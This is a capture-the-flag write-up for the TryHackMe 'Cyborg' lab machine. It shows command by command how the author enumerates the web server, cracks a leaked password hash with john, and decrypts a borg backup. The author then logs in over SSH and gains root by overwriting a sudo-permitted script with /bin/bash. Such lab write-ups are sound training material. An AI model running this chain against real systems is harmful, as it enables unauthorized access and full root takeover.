CTF : Cyborg

CTF Cyborg writeup. Source THM. Announced difficulty level: Easy

Posted by Boula-Bytes on 13 July 2022

CTF : Cyborg

Informations

  • IP: 10.10.26.96
  • MYIP: 10.9.85.5

First enumeration

Basics

  • NMAP
console
$ sudo nmap -p22,80 -A 10.10.26.96
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-12 23:54 CEST
Nmap scan report for 10.10.26.96
Host is up (0.042s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 db:b2:70:f3:07:ac:32:00:3f:81:b8:d0:3a:89:f3:65 (RSA)
|   256 68:e6:85:2f:69:65:5b:e7:c6:31:2c:8e:41:67:d7:ba (ECDSA)
|_  256 56:2c:79:92:ca:23:c3:91:49:35:fa:dd:69:7c:ca:ab (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Sony X75CH-series Android TV (Android 5.0) (92%), Linux 2.6.32 (92%), Linux 3.2 - 4.9 (92%), Linux 3.7 - 3.10 (92%), QNAP QTS 4.0 - 4.2 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 443/tcp)
HOP RTT      ADDRESS
1   37.78 ms 10.9.0.1
2   37.77 ms 10.10.26.96

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.49 seconds

Vulnerabilities search

console
dirsearch -r -u http://10.10.26.96 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -f

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 1543815

Output File: /home/boula/.dirsearch/reports/10.10.26.96/_22-07-13_00-01-41.txt

Error Log: /home/boula/.dirsearch/logs/errors-22-07-13_00-01-41.log

Target: http://10.10.26.96/

[00:01:42] Starting: 
[00:01:42] 200 -   11KB - /index.html
[00:01:46] 403 -  276B  - /icons/     (Added to queue)
[00:01:54] 200 -    6KB - /admin/     (Added to queue)
[00:01:54] 301 -  310B  - /admin  ->  http://10.10.26.96/admin/
[00:02:56] 200 -  926B  - /etc/     (Added to queue)
[00:02:56] 301 -  308B  - /etc  ->  http://10.10.26.96/etc/
[                    ] 4% 68337/1543815       252/s       job:1/4  errors:0

I found two files http://10.10.26.96/etc/squid/

  • squid.conf
  • passwd

In passwd I found some creds :

music_archive:$apr1$BpZ.Q.1m$F0qqPwHSOG50URuOVQTTn.

Using john I manage to crack it : 

console
$ john ./hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt
$ john ./hashes.txt --show
music_archive:xxxxxxxx

1 password hash cracked, 0 left

After that I decided to explore http://10.10.26.96/admin/

One menu let us download a tar archive file : http://10.10.26.96/admin/archive.tar

Let's see what we can find in this archive...

The archive contains an encrypted borg backup repository. But passphrase is the one we crack earlier.

console
$ borg list home/field/dev/final_archive/
Enter passphrase for key /home/boula/CTF/Cyborg/home/field/dev/final_archive: 
music_archive                        Tue, 2020-12-29 15:00:38 [f789ddb6b0ec108d130d16adebf5713c29faf19c44cad5e1eeb8ba37277b1c82]

Now, we can extract the backup in a directory to explore it : 

console
$ borg extract home/field/dev/final_archive/::music_archive
Enter passphrase for key /home/boula/CTF/Cyborg/home/field/dev/final_archive:

Exploit

There is a note :

console
cat ./Documents/note.txt
Wow I'm awful at remembering Passwords so I've taken my Friends advice and noting them down!

alex:xxxxxxxx

With this note we can connect through ssh as alex

Privilege escalation

Enumeration for privesc

console
$ sudo -l
Matching Defaults entries for alex on ubuntu:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User alex may run the following commands on ubuntu:
    (ALL : ALL) NOPASSWD: /etc/mp3backups/backup.sh

So alex can call a script with root powers.

Exploit

Let's see what can do

console
$ ls -al /etc/mp3backups/backup.sh
-r-xr-xr-- 1 alex alex 1083 Dec 30  2020 /etc/mp3backups/backup.sh

Alex own the file but don't have write rights. But we can change that.

console
$ chmod +w /etc/mp3backups/backup.sh

Now we can modify the script :

console
$ echo "/bin/bash" > /etc/mp3backups/backup.sh

And then, exploit !

console
$ sudo /etc/mp3backups/backup.sh
root@ubuntu:~# cat /root/root.txt

\o/